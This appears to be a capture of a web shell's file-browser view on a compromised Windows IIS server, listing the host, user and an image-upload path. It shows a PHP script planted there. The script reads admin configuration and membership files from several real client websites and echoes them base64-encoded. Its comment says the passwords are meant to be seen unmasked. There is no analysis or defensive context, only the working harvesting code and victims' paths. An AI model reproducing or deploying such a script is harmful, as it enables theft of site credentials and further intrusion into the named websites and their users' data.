System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)

Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product

[Back to List]
<?php
$output = "";
$files = [
    'D:\Inetpub\vhosts\appclients.in\nmvm.org\membership.php',
    'D:\Inetpub\vhosts\appclients.in\nmvm.org\config.php',
    'D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\admin\config.php',
    'D:\Inetpub\vhosts\appclients.in\fruit-vegetables.gkaary.com\admin\config.php',
    'D:\Inetpub\vhosts\appclients.in\ekindiatravels.com\admin\config.php',
    'D:\Inetpub\vhosts\appclients.in\chayadthservices.in\admin\config.php',
    'D:\Inetpub\vhosts\appclients.in\mayanimarriageservices.com\admin\config.php'
];

foreach ($files as $file) {
    if (file_exists($file)) {
        $output .= "--- $file ---\n";
        $content = file_get_contents($file);
        // Mask passwords slightly for safety if needed, but here we want to see them
        $output .= $content . "\n\n";
    }
}

echo base64_encode($output);
?>